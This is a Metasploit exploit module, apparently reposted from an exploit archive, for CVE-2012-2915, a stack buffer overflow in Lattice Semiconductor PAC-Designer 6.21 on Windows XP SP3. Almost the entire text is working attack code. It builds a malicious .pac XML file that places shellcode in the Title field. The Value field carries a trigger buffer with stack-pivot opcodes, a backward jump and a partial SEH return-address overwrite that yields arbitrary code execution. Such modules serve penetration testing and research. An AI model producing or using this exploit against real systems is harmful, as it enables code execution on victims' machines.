Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
 
    include Msf::Exploit::FILEFORMAT
 
    def initialize(info={})
        super(update_info(info,
            'Name'           => "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",
            'Description'    => %q{
                    This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer
                6.21.  As a .pac file, when supplying a long string of data to the 'value' field
                under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption
                on the stack, which results in arbitrary code execution under the context of the
                user.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Unknown',      #Discovery
                    'juan vazquez', #Metasploit
                    'sinn3r'        #Metasploit
                ],
            'References'     =>
                [
                    ['CVE', '2012-2915'],
                    ['OSVDB', '82001'],
                    ['EDB', '19006'],
                    ['BID', '53566'],
                    ['URL', 'http://secunia.com/advisories/48741']
                ],
            'Payload'        =>
                {
                    'BadChars' => "\x00\x3c\x3e",
                    'StackAdjustment' => -3500,
                },
            'DefaultOptions'  =>
                {
                    'ExitFunction' => "seh"
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [
                        'PAC-Designer 6.21 on Windows XP SP3',
                        {
                            # P/P/R in PACD621.exe
                            # ASLR: False, Rebase: False, SafeSEH: False, OS: False
                            'Ret' => 0x00805020
                        }
                    ],
                ],
            'Privileged'     => false,
            'DisclosureDate' => "May 16 2012",
            'DefaultTarget'  => 0))
 
        register_options(
            [
                OptString.new('FILENAME', [true, 'The filename', 'msf.pac'])
            ], self.class)
    end
 
    def exploit
        # The payload is placed in the <title> field
        p = payload.encoded
 
        # The trigger is placed in the <value> field, which will jmp to our
        # payload in the <title> field.
        buf  = "\x5f"    #POP EDI
        buf << "\x5f"    #POP EDI
        buf << "\x5c"    #POP ESP
        buf << "\x61"*6  #POPAD x 6
        buf << "\x51"    #PUSH ECX
        buf << "\xc3"    #RET
        buf << rand_text_alpha(96-buf.length, payload_badchars)
        buf << "\xeb\x9e#{rand_text_alpha(2, payload_badchars)}"  #Jmp back to the beginning of the buffer
        buf << [target.ret].pack('V')[0,3] # Partial overwrite
 
        xml = %Q|<?xml version="1.0"?>
<PacDesignData>
    <DocFmtVersion>1</DocFmtVersion>
    <DeviceType>ispPAC-CLK5410D</DeviceType>
    <CreatedBy>PAC-Designer 6.21.1336</CreatedBy>
    <SummaryInformation>
        <Title>#{p}</Title>
        <Author>#{Rex::Text.rand_text_alpha(6)}</Author>
    </SummaryInformation>
 
    <SymbolicSchematicData>
        <Symbol>
            <SymKey>153</SymKey>
            <NameText>Profile 0 Ref Frequency</NameText>
            <Value>#{buf}</Value>
        </Symbol>
    </SymbolicSchematicData>
</PacDesignData>|
 
        file_create(xml)
    end
end



#  0day.today [2018-03-19]  #